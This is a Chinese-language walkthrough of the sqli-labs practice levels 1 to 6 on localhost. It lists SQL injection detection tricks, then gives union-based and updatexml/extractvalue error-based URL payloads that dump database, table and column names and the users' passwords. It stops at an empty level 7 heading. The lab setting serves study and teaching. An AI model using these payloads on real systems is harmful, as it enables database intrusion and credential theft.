SQLi注入-实战篇-2020-04-07
1、单引号判断
http://localhost/sqli/Less-1/?id=1' 如果出现错误提示,则该网站可能就存在注入漏洞
2、and判断
http://localhost/sqli/Less-1/?id=1' and 1=1--+ 这个条件永远都是真的,所以当然返回是正常页
http://localhost/sqli/Less-1/?id=1' and 1=2--+ 如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。
3、OR判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
http://localhost/sqli/Less-1/?id=1' or 1=1--+
http://localhost/sqli/Less-1/?id=1' or 1=2--+
两个语句都是返回正确,这就是证明有注入点。
4、xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)
http://localhost/sqli/Less-1/?id=1' xor 1=1--+ #返回错误的页面,存在注入点
http://localhost/sqli/Less-1/?id=1' xor 1=2--+ #返回正确的页面,存在注入点
5、加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)
http://localhost/sqli/Less-2/?id=10-0 #正常
http://localhost/sqli/Less-2/?id=10-1 #正常
http://localhost/sqli/Less-2/?id=10+1 #错误
6、输入框判断
可以使用特殊符号去判断
#@!$/...
第一关 ('单引号闭合)
http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1' 数据库报错,认为这里有注入点
http://localhost/sqli/Less-1/?id=1' order by 3--+ 判断有多少个列数
http://localhost/sqli/Less-1/?id=-1' union select 1,2,3--+ union注入开始
http://localhost/sqli/Less-1/?id=-1' union select 1,database(),3--+ 得到数据库security
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 获取表名 users
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ 获取表字段 username,password
http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(username,'|',password),3 from users--+ 账号密码
第二关 (无需闭合注入)
http://localhost/sqli/Less-2
http://127.0.0.1/sqli/Less-2/?id=1' #数据库报错,这里有上传点
http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+ #等到列数是3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ #union注入 http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3--+ #得到数据库是security
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #获得数据表名是users
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #获取表的字段
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(password,'~',username),3 from users--+
http://localhost/sqli/Less-3/?id=1' #看到报错信息,尝试')作为闭合点
http://localhost/sqli/Less-3/?id=1') and 1=1--+ #无报错证明,闭合成功
http://localhost/sqli/Less-3/?id=-1') order by 3--+ #测出列数为3
http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3--+ #得到数据库security
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #得到数据表users
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #得到数据表的字段username和password
http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(username,'~',password),3 from users--+
第四关
http://localhost/sqli/Less-4
http://localhost/sqli/Less-4/?id=1%27 #单引号没有报错信息
http://localhost/sqli/Less-4?id=1" #看到报错信息,确定报错语句是双引号
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
http://localhost/sqli/Less-4?id=1"--+ #构造一个正确的闭合条件
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://localhost/sqli/Less-4?id=1")--+ #返回正常,闭合成功
http://localhost/sqli/Less-4?id=1") order by 3--+ #获取列数3
http://localhost/sqli/Less-4?id=-1") union select 1,database(),3--+ #得到数据库security
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",table_name),3 from information_schema.tables where table_schema=database()--+ #得到数据表users
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",column_name),3 from information_schema.columns where table_name='users'--+ #得到users表的字段username,password
http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",username,"~",password),3 from users--+ #得到数据库user的用户名和密码
第五关 ('单引号闭合&&updatexml报错注入)
http://localhost/sqli/Less-5
http://localhost/sqli/Less-5/?id=1' #报错了,显然知道单引号是关键
http://localhost/sqli/Less-5/?id=1' order by 3--+ #报错列数为3
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1)),3--+ #得到数据库security
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)),3--+ #得到数据表users
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)),3--+ #得到数据库字段password
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1)),3--+ #得到数据库字段username
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)),3--+ #用户名Dumb
http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)),3--+ #密码Dumb
第六关 ("双引号闭合&&extractvalue报错注入)
http://localhost/sqli/Less-6
http://localhost/sqli/Less-6/?id=6"--+ #很明显的说双引号就是闭合点
http://localhost/sqli/Less-6/?id=6" order by 3--+ #列数为3
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select database()),0x7e))),3--+ #数据库security
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))),3--+ #数据表users
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e))),3--+ #数据表的字段password
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e))),3--+ #数据表的字段username
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select username from users limit 7,1),0x7e))),3--+ #获得用户名admin
http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select password from users limit 7,1),0x7e))),3--+
第七关
http://localhost/sqli/Less-7